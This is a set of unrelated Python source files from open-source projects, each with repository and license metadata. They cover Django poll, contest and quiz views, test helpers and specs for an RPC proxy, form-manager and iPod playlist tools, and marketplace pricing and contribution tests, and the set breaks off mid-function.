def GenerateNormalResponse( self, params, keysAndValues = {} ):
data = {
'params' : params,
'configs' : self.GetConfigs()
}
data.update( keysAndValues )
dataStr = json.dumps( data, encoding = 'utf-8', indent = 2, sort_keys = True )
# Workaround while we build up the server-client architecture
self.response.headers['Access-Control-Allow-Origin'] = 'http://' + self.request.env['REMOTE_ADDR'] + ':8080'
if self.IsJsonFormat():
return dataStr
else:
data[ 'content' ] = dataStr
return data
|
jyt109/termite-data-server
|
server_src/modules/core.py
|
Python
|
bsd-3-clause
| 4,206
|
from .common import * # noqa
LANGUAGE_CODE = 'nb'
|
devilry/trix2
|
trix/project/develop/settings/develop.py
|
Python
|
bsd-3-clause
| 57
|
# -*- coding: utf-8 -*-
import base64
import inspect
import json
import logging
import requests
import types
from django.conf import settings
from django.core.management import call_command
from django_nose import FastFixtureTestCase
from functools import wraps
from mock import patch
from tastypie.test import ResourceTestCase, TestApiClient
from rpc_proxy.proxies import get_setting
INITIAL_DATA = ('initial_data',)
TEST_DATA = ('test_data',)
logger = logging.getLogger(__name__)
def mock_request(obj, method, url, **kwargs):
client = TestApiClient()
authentication = 'Basic %s' % base64.b64encode(':'.join([
get_setting('SUPERUSER_USERNAME', None),
get_setting('SUPERUSER_PASSWORD', None),
]))
if method == 'GET':
data = kwargs.get('params', {})
djresponse = client.get(url, data=data, authentication=authentication)
elif method == 'POST':
data = json.loads(kwargs.get('data', '{}'))
djresponse = client.post(url, data=data, authentication=authentication)
elif method == 'PUT':
data = json.loads(kwargs.get('data', '{}'))
djresponse = client.put(url, data=data, authentication=authentication)
elif method == 'PATCH':
data = json.loads(kwargs.get('data', '{}'))
djresponse = client.patch(url, data=data, authentication=authentication)
elif method == 'DELETE':
data = kwargs.get('params', {})
djresponse = client.delete(url, data=data, authentication=authentication)
# convert django.http.HttpResponse to requests.models.Response
response = requests.models.Response()
response.status_code = djresponse.status_code
response.headers = {}
try:
response.headers['content-type'] = djresponse['content-type']
response.headers['location'] = djresponse['location']
except:
pass
response.encoding = requests.utils.get_encoding_from_headers(response.headers)
response._content = djresponse.content
return response
def mock_cache_set(key, value, timeout=None):
# do nothing
pass
def mock_api(func, **decorator_kwargs):
@patch('requests.sessions.Session.request', mock_request)
@patch('tastypie.cache.SimpleCache.set', mock_cache_set)
@wraps(func)
def wrapper(*args, **kwargs):
return func(*args, **kwargs)
return wrapper
class TestCase(FastFixtureTestCase):
"""
Don't be smart in test cases!
"""
fixtures = INITIAL_DATA
def __new__(cls, name):
testcase = super(TestCase, cls).__new__(cls)
if get_setting('API_URL', None):
try:
func_type = types.UnboundMethodType
except:
func_type = types.FunctionType
for name, func in inspect.getmembers(testcase):
if isinstance(func, func_type) and name.startswith('test_'):
setattr(testcase, name, mock_api(func))
return testcase
def setUp(self):
call_command('loaddata', *TEST_DATA)
super(TestCase, self).setUp()
class Proxy(TestCase):
"""
Don't be smart in test cases!
CAVEAT: Proxy classes have to be imported within each test method
to mock the requests
"""
pass
|
nk113/tastypie-rpc-proxy
|
rpc_proxy/test.py
|
Python
|
bsd-3-clause
| 3,241
|
from hq.models import Domain
from xformmanager.models import FormDataColumn, FormDataGroup, FormDataPointer
from xformmanager.manager import *
from xformmanager.storageutility import StorageUtility
from receiver.models import Submission, Attachment
from receiver.tests.util import *
import logging
def clear_data():
"""Clear most of the data in the system: schemas,
submissions, and attachments. Useful in the
setup and/or teardown methods of tests.
"""
su = StorageUtility()
su.clear()
Submission.objects.all().delete()
Attachment.objects.all().delete()
def clear_group_data():
"""Clear out the form group objects"""
FormDataGroup.objects.all().delete()
FormDataColumn.objects.all().delete()
FormDataPointer.objects.all().delete()
def get_file(filename, path=None ):
""" handles relative pathing of files """
if not path:
path = os.path.dirname(__file__)
return os.path.join( path, filename )
def create_xsd_and_populate(xsd_file_name, xml_file_name='', domain=None, path=None):
if domain:
mockdomain = domain
elif Domain.objects.all().count() == 0:
mockdomain = Domain(name='mockdomain')
mockdomain.save()
else:
mockdomain = Domain.objects.all()[0]
formdefmodel = create_xsd(xsd_file_name, mockdomain, path=path)
populate(xml_file_name, mockdomain, path)
return formdefmodel
def create_xsd(xsd_file_name, domain=None, path=None):
if not path:
path = os.path.dirname(__file__)
xsd_file_path = os.path.join(path,xsd_file_name)
if xsd_file_name is None:
return None
f = open(xsd_file_path,"r")
manager = XFormManager()
formdefmodel = manager.add_schema(xsd_file_name, f)
f.close()
# fake out the form submission
formdefmodel.submit_ip = '127.0.0.1'
formdefmodel.bytes_received = os.path.getsize(xsd_file_path)
formdefmodel.form_display_name = 'mock display name'
formdefmodel.domain = domain
formdefmodel.save()
return formdefmodel
def populate(xml_file_name, domain=None, path=None):
""" returns submission """
if xml_file_name:
return create_fake_submission(xml_file_name, domain, path)
def create_fake_submission(xml_file, domain, path=None):
if not path:
# can't use get_full_path on the body since it's not relative to that file
# the default assumes it's relative to this file
path = os.path.dirname(__file__)
full_body_path = os.path.join(path, xml_file)
submission = makeNewEntry(get_full_path('simple-meta.txt'), full_body_path, domain)
return submission
|
commtrack/commtrack-old-to-del
|
apps/xformmanager/tests/util.py
|
Python
|
bsd-3-clause
| 2,666
|
# -*- coding: utf-8 -*-
from expects import expect
from mamba import describe, context, before
from spec.ui._ipod_helpers import *
from spec.ui._fixture import update_environment
with describe('ipodio playlist create') as _:
@before.all
def setup_all():
_.new_name = 'leño'
_.playlist_name = 'playlist'
_.existing_name = 'roña'
update_environment(_)
bootstrap_ipod(_.mountpoint_path)
create_playlist(_.mountpoint_path, _.playlist_name)
create_playlist(_.mountpoint_path, _.existing_name)
def should_print_an_error():
execution = _.env.run(*_.cmd + ['playlist', 'rename'], expect_error=True)
expect(execution.stderr).to.have('Usage:')
with context('given a non existing playlist name'):
def should_print_an_error_():
execution = _.env.run(*_.cmd + ['playlist', 'rename', _.new_name, _.playlist_name])
expect(execution.stdout).to.have('does not exist')
with context('given an existing playlist name'):
def should_print_an_error__():
execution = _.env.run(*_.cmd + ['playlist', 'rename'], expect_error=True)
expect(execution.stderr).to.have('Usage:')
with context('given an existing playlist name'):
def should_print_an_error___():
execution = _.env.run(*_.cmd + ['playlist', 'rename', _.playlist_name, _.existing_name])
expect(execution.stdout).to.have('already exists')
with context('and another valid playlist name'):
def should_rename_that_playlist():
execution = _.env.run(*_.cmd + ['playlist', 'rename', _.playlist_name, _.new_name])
playlists = get_ipod_playlists_by_name(_.mountpoint_path)
expect(playlists).to.have(_.new_name)
expect(playlists).not_to.have(_.playlist_name)
expect(execution.stdout).to.have('renamed to')
|
jvrsantacruz/ipodio
|
spec/ui/playlist_rename_spec.py
|
Python
|
bsd-3-clause
| 1,953
|
from datetime import datetime, timedelta
from itertools import chain, cycle
from django.shortcuts import render_to_response
from django.utils.translation import ugettext, ugettext_lazy as _
from django.http import HttpResponseRedirect, Http404
from django import forms
from django.views.decorators.http import require_POST
from django.db import transaction
from django.contrib.contenttypes.models import ContentType
from django.template import RequestContext
from django.contrib.sites.models import Site
from django.template.defaultfilters import slugify
from django.utils.safestring import mark_safe
from django.utils.encoding import force_unicode
from django.contrib.formtools.wizard import FormWizard
from django.views.decorators.csrf import csrf_protect
from ella.core.cache import get_cached_object_or_404
from ella.core.views import get_templates_from_publishable
from ella_polls.models import Poll, Contestant, Survey
from ella_polls.conf import polls_settings
def get_next_url(request):
"""
Return URL for redirection
Try to get it from:
* POST param 'next'
* HTTP_REFERER
"""
if 'next' in request.POST: # and request.POST['next'].startswith('/'):
return request.POST['next']
else:
return request.META.get('HTTP_REFERER', '/')
def poll_check_vote(request, poll):
"""
To avoid multiple poll votes of the same user.
Uses sessions (authenticatedd users) or cookies (annonymous users) at first.
Then it looks it up in Votes.
Return choices:
* User not yet voted
* User just voted
* User allready voted
* User try to vote with no choice (usefull to display a message in a Poll box)
"""
sess_jv = request.session.get(polls_settings.POLL_JUST_VOTED_COOKIE_NAME, [])
# removing just voted info from session
if poll.id in sess_jv:
del request.session[polls_settings.POLL_JUST_VOTED_COOKIE_NAME]
# TODO - del just my poll, not the entire list !
return polls_settings.USER_JUST_VOTED
# removing no vote info from session
sess_nv = request.session.get(polls_settings.POLL_NO_CHOICE_COOKIE_NAME, [])
if poll.id in sess_nv:
del request.session[polls_settings.POLL_NO_CHOICE_COOKIE_NAME]
# TODO - del just my poll, not the entire list !
return polls_settings.USER_NO_CHOICE
# authenticated user - check session
if request.user.is_authenticated():
sess = request.session.get(polls_settings.POLL_COOKIE_NAME, [])
if poll.id in sess:
return polls_settings.USER_ALLREADY_VOTED
# otherwise check Vote object - just for sure
if poll.check_vote_by_user(request.user):
return polls_settings.USER_ALLREADY_VOTED
return polls_settings.USER_NOT_YET_VOTED
# anonymous - check cookie
else:
cook = request.COOKIES.get(polls_settings.POLL_COOKIE_NAME, '').split(',')
if str(poll.id) in cook:
return polls_settings.USER_ALLREADY_VOTED
ip_address = request.META['REMOTE_ADDR']
# otherwise check Vote object - just for sure
if poll.check_vote_by_ip_address(ip_address):
return polls_settings.USER_ALLREADY_VOTED
return polls_settings.USER_NOT_YET_VOTED
def survey_check_vote(request, survey):
sess_jv = request.session.get(polls_settings.SURVEY_JUST_VOTED_COOKIE_NAME, [])
# removing just voted info from session
if survey.id in sess_jv:
del request.session[polls_settings.SURVEY_JUST_VOTED_COOKIE_NAME]
# TODO - del just my poll, not the entire list !
return polls_settings.USER_JUST_VOTED
# removing no vote info from session
sess_nv = request.session.get(polls_settings.SURVEY_NO_CHOICE_COOKIE_NAME, [])
if survey.id in sess_nv:
del request.session[polls_settings.SURVEY_NO_CHOICE_COOKIE_NAME]
# TODO - del just my poll, not the entire list !
return polls_settings.USER_NO_CHOICE
# authenticated user - check session
if request.user.is_authenticated():
sess = request.session.get(polls_settings.SURVEY_COOKIE_NAME, [])
if survey.id in sess:
return polls_settings.USER_ALLREADY_VOTED
# otherwise check Vote object - just for sure
if survey.check_vote_by_user(request.user):
return polls_settings.USER_ALLREADY_VOTED
return polls_settings.USER_NOT_YET_VOTED
# anonymous - check cookie
else:
cook = request.COOKIES.get(polls_settings.SURVEY_COOKIE_NAME, '').split(',')
if str(survey.id) in cook:
return polls_settings.USER_ALLREADY_VOTED
ip_address = request.META['REMOTE_ADDR']
# otherwise check Vote object - just for sure
if survey.check_vote_by_ip_address(ip_address):
return polls_settings.USER_ALLREADY_VOTED
return polls_settings.USER_NOT_YET_VOTED
@csrf_protect
@require_POST
@transaction.commit_on_success
def poll_vote(request, poll_id):
poll_ct = ContentType.objects.get_for_model(Poll)
poll = get_cached_object_or_404(poll_ct, pk=poll_id)
url = get_next_url(request)
# activity check
if not poll.is_active():
return HttpResponseRedirect(url)
# vote check
if poll_check_vote(request, poll) != polls_settings.USER_NOT_YET_VOTED:
return HttpResponseRedirect(url)
form = QuestionForm(poll.question)(request.POST)
# invalid input
if not form.is_valid():
# no choice selected error - via session
sess_nv = request.session.get(polls_settings.POLL_NO_CHOICE_COOKIE_NAME, [])
sess_nv.append(poll.id)
request.session[polls_settings.POLL_NO_CHOICE_COOKIE_NAME] = sess_nv
return HttpResponseRedirect(url)
# vote save
kwa = {}
if request.user.is_authenticated():
kwa['user'] = request.user
kwa['ip_address'] = request.META['REMOTE_ADDR']
poll.vote(form.cleaned_data['choice'], **kwa)
# just voted info session update
sess_jv = request.session.get(polls_settings.POLL_JUST_VOTED_COOKIE_NAME, [])
sess_jv.append(poll.id)
request.session[polls_settings.POLL_JUST_VOTED_COOKIE_NAME] = sess_jv
response = HttpResponseRedirect(url)
# authenticated user vote - session update
if request.user.is_authenticated():
sess = request.session.get(polls_settings.POLL_COOKIE_NAME, [])
sess.append(poll.id)
request.session[polls_settings.POLL_COOKIE_NAME] = sess
# annonymous user vote - cookies update
else:
cook = request.COOKIES.get(polls_settings.POLL_COOKIE_NAME, '').split(',')
if len(cook) > polls_settings.POLL_MAX_COOKIE_LENGTH:
cook = cook[1:]
cook.append(str(poll.id))
expires = datetime.strftime(datetime.utcnow() + \
timedelta(seconds=polls_settings.POLL_MAX_COOKIE_AGE),
"%a, %d-%b-%Y %H:%M:%S GMT")
response.set_cookie(
polls_settings.POLL_COOKIE_NAME,
value=','.join(cook),
max_age=polls_settings.POLL_MAX_COOKIE_AGE,
expires=expires,
path='/',
domain=Site.objects.get_current().domain,
secure=None
)
return response
@csrf_protect
@require_POST
@transaction.commit_on_success
def survey_vote(request, survey_id):
survey_ct = ContentType.objects.get_for_model(Survey)
survey = get_cached_object_or_404(survey_ct, pk=survey_id)
url = get_next_url(request)
# activity check
if not survey.current_activity_state == polls_settings.ACTIVITY_ACTIVE:
return HttpResponseRedirect(url)
# vote check
if survey_check_vote(request, survey) != polls_settings.USER_NOT_YET_VOTED:
return HttpResponseRedirect(url)
form = QuestionForm(survey)(request.POST)
# invalid input
if not form.is_valid():
# no choice selected error - via session
sess_nv = request.session.get(polls_settings.SURVEY_NO_CHOICE_COOKIE_NAME, [])
sess_nv.append(survey.id)
request.session[polls_settings.SURVEY_NO_CHOICE_COOKIE_NAME] = sess_nv
return HttpResponseRedirect(url)
# vote save
kwa = {}
if request.user.is_authenticated():
kwa['user'] = request.user
kwa['ip_address'] = request.META['REMOTE_ADDR']
survey.vote(form.cleaned_data['choice'], **kwa)
# just voted info session update
sess_jv = request.session.get(polls_settings.SURVEY_JUST_VOTED_COOKIE_NAME, [])
sess_jv.append(survey.id)
request.session[polls_settings.SURVEY_JUST_VOTED_COOKIE_NAME] = sess_jv
response = HttpResponseRedirect(url)
# authenticated user vote - session update
if request.user.is_authenticated():
sess = request.session.get(polls_settings.SURVEY_COOKIE_NAME, [])
sess.append(survey.id)
request.session[polls_settings.SURVEY_COOKIE_NAME] = sess
# annonymous user vote - cookies update
else:
cook = request.COOKIES.get(polls_settings.SURVEY_COOKIE_NAME, '').split(',')
if len(cook) > polls_settings.SURVEY_MAX_COOKIE_LENGTH:
cook = cook[1:]
cook.append(str(survey.id))
expires = datetime.strftime(datetime.utcnow() + timedelta(seconds=polls_settings.SURVEY_MAX_COOKIE_AGE), "%a, %d-%b-%Y %H:%M:%S GMT")
response.set_cookie(
polls_settings.SURVEY_COOKIE_NAME,
value=','.join(cook),
max_age=polls_settings.SURVEY_MAX_COOKIE_AGE,
expires=expires,
path='/',
domain=Site.objects.get_current().domain,
secure=None
)
return response
@csrf_protect
@transaction.commit_on_success
def contest_vote(request, context):
contest = context['object']
forms = []
forms_are_valid = True
# question forms
for question in contest.questions:
form = QuestionForm(question)(request.POST or None, prefix=str(question.id))
if not form.is_valid():
forms_are_valid = False
forms.append((question, form))
# contestant form
initial = {}
if request.user.is_authenticated():
initial['name'] = request.user.first_name
initial['surname'] = request.user.last_name
initial['email'] = request.user.email
contestant_form = ContestantForm(request.POST or None, initial=initial)
if not contestant_form.is_valid():
forms_are_valid = False
# saving contestant
if forms_are_valid and contest.is_active():
return contest_finish(request, context, forms, contestant_form)
context.update({
'forms' : forms,
'contestant_form' : contestant_form,
'activity_not_yet_active' : polls_settings.ACTIVITY_NOT_YET_ACTIVE,
'activity_active' : polls_settings.ACTIVITY_ACTIVE,
'activity_closed' : polls_settings.ACTIVITY_CLOSED
})
return render_to_response(
get_templates_from_publishable('form.html', context['object']),
context,
context_instance=RequestContext(request)
)
class MyCheckboxSelectMultiple(forms.CheckboxSelectMultiple):
def render(self, name, value, attrs=None, choices=()):
if value is None: value = []
has_id = attrs and 'id' in attrs
final_attrs = self.build_attrs(attrs, name=name)
str_values = set([force_unicode(v) for v in value]) # Normalize to strings.
for i, (option_value, option_label) in enumerate(chain(self.choices, choices)):
# If an ID attribute was given, add a numeric index as a suffix,
# so that the checkboxes don't all have the same ID attribute.
if has_id:
final_attrs = dict(final_attrs, id='%s_%s' % (attrs['id'], i))
cb = forms.CheckboxInput(final_attrs, check_test=lambda value: value in str_values)
option_value = force_unicode(option_value)
yield mark_safe(u'<label>%s %s</label>' % (cb.render(name, option_value), force_unicode(option_label)))
class MyRadioSelect(forms.RadioSelect):
def render(self, name, value, attrs=None, choices=()):
return self.get_renderer(name, value, attrs, choices)
def fudge_choice_percentages(choices):
percent_sum = 0
choice_list = list(choices)
for choice in choice_list:
choice.percentage = choice.get_percentage()
percent_sum += choice.percentage
choice_iter = cycle(choice_list)
step = cmp(100, percent_sum)
while percent_sum != 100:
choice = choice_iter.next()
choice.percentage += step
percent_sum += step
return choice_list
def QuestionForm(question):
if question.allow_multiple:
choice_field = forms.ModelMultipleChoiceField(
queryset=question.choices,
widget=MyCheckboxSelectMultiple,
required=not question.allow_no_choice
)
else:
choice_field = forms.ModelChoiceField(
queryset=question.choices,
widget=MyRadioSelect,
empty_label=None,
required=not question.allow_no_choice
)
class _QuestionForm(forms.Form):
"""
Question form with all its choices
"""
choice = choice_field
def choices(self):
field = self['choice']
# TODO: move choice percentage to question and use it here!!
choice_list = fudge_choice_percentages(field.field.queryset)
for choice, input in zip(choice_list, field.as_widget(field.field.widget)):
yield choice, input
return _QuestionForm
class ContestantForm(forms.Form):
name = Contestant._meta.get_field('name').formfield()
surname = Contestant._meta.get_field('surname').formfield()
email = Contestant._meta.get_field('email').formfield()
phonenumber = Contestant._meta.get_field('phonenumber').formfield()
address = Contestant._meta.get_field('address').formfield()
count_guess = Contestant._meta.get_field('count_guess').formfield()
def clean(self):
# TODO - antispam
return self.cleaned_data
@transaction.commit_on_success
def contest_finish(request, context, qforms, contestant_form):
contest = context['object']
email = contestant_form.cleaned_data['email']
if Contestant.objects.filter(email=email, contest=contest).count() > 0:
context.update({
'duplicate' : True,
'forms' : qforms,
'contestant_form' : contestant_form,
})
return render_to_response(
get_templates_from_publishable('form.html', context['object']),
context,
context_instance=RequestContext(request)
)
choices = '|'.join(
'%d:%s' % (
question.id,
question.allow_multiple and ','.join(str(c.id) for c in sorted(f.cleaned_data['choice'], key=lambda ch: ch.id)) or f.cleaned_data['choice'].id)
for question, f in sorted(qforms, key=lambda q: q[0].id)
)
c = Contestant(
contest=contest,
choices=choices,
**contestant_form.cleaned_data
)
if request.user.is_authenticated():
c.user = request.user
c.save()
return HttpResponseRedirect(contest.get_absolute_url() + slugify(ugettext('result')) + u'/')
def contest_result(request, context):
return render_to_response(
get_templates_from_publishable('result.html', context['object']),
context,
context_instance=RequestContext(request)
)
def contest_conditions(request, context):
return render_to_response(
get_templates_from_publishable('conditions.html', context['object']),
context,
context_instance=RequestContext(request)
)
RESULT_FIELD = 'results'
class QuizWizard(FormWizard):
def __init__(self, quiz):
form_list = [ QuestionForm(q) for q in quiz.questions ]
super(QuizWizard, self).__init__(form_list)
self.quiz = quiz
self.extra_context = {'object' : quiz, 'question' : quiz.questions[0], 'category' : quiz.category, }
def get_template(self, step):
return get_templates_from_publishable('step.html', self.extra_context['object'])
def process_step(self, request, form, step):
if (step + 1) < len(self.form_list):
self.extra_context['question'] = self.quiz.questions[step + 1]
def done(self, request, form_list):
points = 0
results = []
for question, f in zip(self.quiz.questions, form_list):
if not question.allow_no_choice:
if question.allow_multiple:
points += sum(c.points for c in f.cleaned_data['choice'])
results.append('%d:%s' % (question.id, ','.join(str(c.id) for c in f.cleaned_data['choice'])))
else:
points += f.cleaned_data['choice'].points
results.append('%d:%s' % (question.id, f.cleaned_data['choice'].id))
results = '|'.join(results)
result = self.quiz.get_result(points)
result.count += 1
result.save()
self.extra_context.update(
{
'result' : result,
'points' : points,
'results' : results,
'result_field': RESULT_FIELD,
'result_action' : self.quiz.get_absolute_url() + slugify(_('results')) + '/'
}
)
return render_to_response(
get_templates_from_publishable('result.html', self.extra_context['object']),
self.extra_context,
context_instance=RequestContext(request)
)
def result_details(request, context):
quiz = context['object']
if not quiz.has_correct_answers:
raise Http404
results = request.GET.get(RESULT_FIELD, '').split('|')
if len(results) != len(quiz.questions):
raise Http404
questions = []
for question, q_res in zip(quiz.questions, results):
q_id, id_list = q_res.split(':')
choices = question.choices
if question.allow_multiple:
cl = set(id_list.split(','))
for ch in choices:
if str(ch.id) in cl:
ch.chosen = True
else:
for ch in choices:
if str(ch.id) == id_list:
ch.chosen = True
break
questions.append((question, choices))
context['questions'] = questions
return render_to_response(
get_templates_from_publishable('result_detail.html', context['object']),
context,
context_instance=RequestContext(request)
)
@csrf_protect
def contest(request, context):
return contest_vote(request, context)
@csrf_protect
def quiz(request, context):
quiz = context['object']
return QuizWizard(quiz)(request, extra_context=context)
|
ella/ella-polls
|
ella_polls/views.py
|
Python
|
bsd-3-clause
| 18,977
|
import datetime
from decimal import Decimal
from django.utils import translation
import mock
from nose.tools import eq_, ok_
import amo
import amo.tests
from addons.models import Addon, AddonUser
from constants.payments import PROVIDER_BANGO, PROVIDER_BOKU
from market.models import AddonPremium, Price, PriceCurrency, Refund
from mkt.constants import apps
from mkt.constants.regions import (ALL_REGION_IDS, BR, HU,
SPAIN, UK, US, RESTOFWORLD)
from stats.models import Contribution
from users.models import UserProfile
class TestPremium(amo.tests.TestCase):
fixtures = ['market/prices.json', 'base/addon_3615.json']
def setUp(self):
self.tier_one = Price.objects.get(pk=1)
self.addon = Addon.objects.get(pk=3615)
def test_is_complete(self):
ap = AddonPremium(addon=self.addon)
assert not ap.is_complete()
ap.price = self.tier_one
assert not ap.is_complete()
ap.addon.paypal_id = 'asd'
assert ap.is_complete()
class TestPrice(amo.tests.TestCase):
fixtures = ['market/prices.json']
def setUp(self):
self.tier_one = Price.objects.get(pk=1)
if hasattr(Price, '_currencies'):
del Price._currencies # needed to pick up fixtures.
def test_active(self):
eq_(Price.objects.count(), 2)
eq_(Price.objects.active().count(), 1)
def test_active_order(self):
Price.objects.create(name='USD', price='0.00')
Price.objects.create(name='USD', price='1.99')
eq_(list(Price.objects.active().values_list('price', flat=True)),
[Decimal('0.00'), Decimal('0.99'), Decimal('1.99')])
def test_method_default_all(self):
price = Price.objects.create(name='USD', price='0.00')
eq_(price.method, 2)
def test_method_specified(self):
price = Price.objects.create(name='USD', price='0.99', method=0)
eq_(price.method, 0)
def test_currency(self):
eq_(self.tier_one.pricecurrency_set.count(), 3)
def test_get(self):
eq_(Price.objects.get(pk=1).get_price(), Decimal('0.99'))
def test_get_tier(self):
translation.activate('en_CA')
eq_(Price.objects.get(pk=1).get_price(), Decimal('0.99'))
eq_(Price.objects.get(pk=1).get_price_locale(), u'US$0.99')
def test_get_tier_and_locale(self):
translation.activate('pt_BR')
eq_(Price.objects.get(pk=2).get_price(), Decimal('1.99'))
eq_(Price.objects.get(pk=2).get_price_locale(), u'US$1,99')
def test_no_region(self):
eq_(Price.objects.get(pk=2).get_price_locale(region=HU.id), None)
def test_fallback(self):
translation.activate('foo')
eq_(Price.objects.get(pk=1).get_price(), Decimal('0.99'))
eq_(Price.objects.get(pk=1).get_price_locale(), u'$0.99')
def test_transformer(self):
price = Price.objects.get(pk=1)
price.get_price_locale()
# Warm up Price._currencies.
with self.assertNumQueries(0):
eq_(price.get_price_locale(), u'$0.99')
def test_get_tier_price(self):
eq_(Price.objects.get(pk=2).get_price_locale(region=BR.id), 'R$1.01')
def test_get_tier_price_provider(self):
# Because we specify Boku, there is no tier to be found.
eq_(Price.objects.get(pk=2)
.get_price_locale(region=BR.id, provider=PROVIDER_BOKU), None)
# Turning on Boku will give us the tier.
PriceCurrency.objects.get(pk=3).update(provider=PROVIDER_BOKU)
eq_(Price.objects.get(pk=2)
.get_price_locale(region=BR.id, provider=PROVIDER_BOKU), 'R$1.01')
def test_get_free_tier_price(self):
price = self.make_price('0.00')
eq_(price.get_price_locale(region=US.id), '$0.00')
def test_euro_placement(self):
with self.activate('en-us'):
eq_(Price.objects.get(pk=2).get_price_locale(region=SPAIN.id),
u'\u20ac0.50')
with self.activate('es'):
eq_(Price.objects.get(pk=2).get_price_locale(region=SPAIN.id),
u'0,50\xa0\u20ac')
def test_prices(self):
currencies = Price.objects.get(pk=1).prices()
eq_(len(currencies), 2)
eq_(currencies[0]['currency'], 'PLN')
def test_wrong_currency(self):
bad = 4999
ok_(bad not in ALL_REGION_IDS)
ok_(not Price.objects.get(pk=1).get_price('foo', region=bad))
def test_prices_provider(self):
currencies = Price.objects.get(pk=1).prices(provider=PROVIDER_BANGO)
eq_(len(currencies), 2)
def test_multiple_providers(self):
PriceCurrency.objects.get(pk=2).update(provider=PROVIDER_BOKU)
# This used to be 0, so changing it to 3 puts in scope of the filter.
with self.settings(PAYMENT_PROVIDERS=['bango', 'boku']):
currencies = Price.objects.get(pk=1).prices()
eq_(len(currencies), 3)
def test_region_ids_by_name_multi_provider(self):
with self.settings(PAYMENT_PROVIDERS=['bango', 'boku']):
eq_(Price.objects.get(pk=2).region_ids_by_name(),
[BR.id, SPAIN.id, UK.id, RESTOFWORLD.id])
def test_region_ids_by_name(self):
eq_(Price.objects.get(pk=2).region_ids_by_name(),
[BR.id, SPAIN.id, RESTOFWORLD.id])
def test_region_ids_by_name_w_provider_boku(self):
eq_(Price.objects.get(pk=2).region_ids_by_name(
provider=PROVIDER_BOKU), [UK.id])
def test_region_ids_by_name_w_provider_bango(self):
eq_(Price.objects.get(pk=2).region_ids_by_name(
provider=PROVIDER_BANGO), [BR.id, SPAIN.id, RESTOFWORLD.id])
def test_provider_regions(self):
with self.settings(PAYMENT_PROVIDERS=['bango', 'boku']):
eq_(Price.objects.get(pk=2).provider_regions(), {
PROVIDER_BANGO: [BR, SPAIN, RESTOFWORLD],
PROVIDER_BOKU: [UK]})
def test_provider_regions_boku(self):
with self.settings(PAYMENT_PROVIDERS=['boku']):
eq_(Price.objects.get(pk=2).provider_regions(), {
PROVIDER_BOKU: [UK]})
def test_provider_regions_bango(self):
with self.settings(PAYMENT_PROVIDERS=['bango']):
eq_(Price.objects.get(pk=2).provider_regions(), {
PROVIDER_BANGO: [BR, SPAIN, RESTOFWORLD]})
class TestPriceCurrencyChanges(amo.tests.TestCase):
def setUp(self):
self.addon = amo.tests.addon_factory()
self.make_premium(self.addon)
self.currency = self.addon.premium.price.pricecurrency_set.all()[0]
@mock.patch('mkt.webapps.tasks.index_webapps')
def test_save(self, index_webapps):
self.currency.save()
eq_(index_webapps.delay.call_args[0][0], [self.addon.pk])
@mock.patch('mkt.webapps.tasks.index_webapps')
def test_delete(self, index_webapps):
self.currency.delete()
eq_(index_webapps.delay.call_args[0][0], [self.addon.pk])
class ContributionMixin(object):
def setUp(self):
self.addon = Addon.objects.get(pk=3615)
self.user = UserProfile.objects.get(pk=999)
def create(self, type):
return Contribution.objects.create(type=type, addon=self.addon,
user=self.user)
def purchased(self):
return (self.addon.addonpurchase_set
.filter(user=self.user, type=amo.CONTRIB_PURCHASE)
.exists())
def type(self):
return self.addon.addonpurchase_set.get(user=self.user).type
class TestContribution(ContributionMixin, amo.tests.TestCase):
fixtures = ['base/addon_3615', 'base/users']
def test_purchase(self):
self.create(amo.CONTRIB_PURCHASE)
assert self.purchased()
def test_refund(self):
self.create(amo.CONTRIB_REFUND)
assert not self.purchased()
def test_purchase_and_refund(self):
self.create(amo.CONTRIB_PURCHASE)
self.create(amo.CONTRIB_REFUND)
assert not self.purchased()
eq_(self.type(), amo.CONTRIB_REFUND)
def test_refund_and_purchase(self):
# This refund does nothing, there was nothing there to refund.
self.create(amo.CONTRIB_REFUND)
self.create(amo.CONTRIB_PURCHASE)
assert self.purchased()
eq_(self.type(), amo.CONTRIB_PURCHASE)
def test_really_cant_decide(self):
self.create(amo.CONTRIB_PURCHASE)
self.create(amo.CONTRIB_REFUND)
self.create(amo.CONTRIB_PURCHASE)
self.create(amo.CONTRIB_REFUND)
self.create(amo.CONTRIB_PURCHASE)
assert self.purchased()
eq_(self.type(), amo.CONTRIB_PURCHASE)
def test_purchase_and_chargeback(self):
self.create(amo.CONTRIB_PURCHASE)
self.create(amo.CONTRIB_CHARGEBACK)
assert not self.purchased()
eq_(self.type(), amo.CONTRIB_CHARGEBACK)
def test_other_user(self):
other = UserProfile.objects.get(email='admin@mozilla.com')
Contribution.objects.create(type=amo.CONTRIB_PURCHASE,
addon=self.addon, user=other)
self.create(amo.CONTRIB_PURCHASE)
self.create(amo.CONTRIB_REFUND)
eq_(self.addon.addonpurchase_set.filter(user=other).count(), 1)
def set_role(self, role):
AddonUser.objects.create(addon=self.addon, user=self.user, role=role)
self.create(amo.CONTRIB_PURCHASE)
installed = self.user.installed_set.filter(addon=self.addon)
eq_(installed.count(), 1)
eq_(installed[0].install_type, apps.INSTALL_TYPE_DEVELOPER)
def test_user_dev(self):
self.set_role(amo.AUTHOR_ROLE_DEV)
def test_user_owner(self):
self.set_role(amo.AUTHOR_ROLE_OWNER)
def test_user_installed_dev(self):
self.create(amo.CONTRIB_PURCHASE)
eq_(self.user.installed_set.filter(addon=self.addon).count(), 1)
def test_user_not_purchased(self):
self.addon.update(premium_type=amo.ADDON_PREMIUM)
eq_(list(self.user.purchase_ids()), [])
def test_user_purchased(self):
self.addon.update(premium_type=amo.ADDON_PREMIUM)
self.addon.addonpurchase_set.create(user=self.user)
eq_(list(self.user.purchase_ids()), [3615L])
def test_user_refunded(self):
self.addon.update(premium_type=amo.ADDON_PREMIUM)
self.addon.addonpurchase_set.create(user=self.user,
type=amo.CONTRIB_REFUND)
eq_(list(self.user.purchase_ids()), [])
def test_user_cache(self):
# Tests that the purchase_ids caches.
self.addon.update(premium_type=amo.ADDON_PREMIUM)
eq_(list(self.user.purchase_ids()), [])
self.create(amo.CONTRIB_PURCHASE)
eq_(list(self.user.purchase_ids()), [3615L])
# This caches.
eq_(list(self.user.purchase_ids()), [3615L])
self.create(amo.CONTRIB_REFUND)
eq_(list(self.user.purchase_ids()), [])
class TestRefundContribution(ContributionMixin, amo.tests.TestCase):
fixtures = ['base/addon_3615', 'base/users']
def setUp(self):
super(TestRefundContribution, self).setUp()
self.contribution = self.create(amo.CONTRIB_PURCHASE)
def do_refund(self, expected, status, refund_reason=None,
rejection_reason=None):
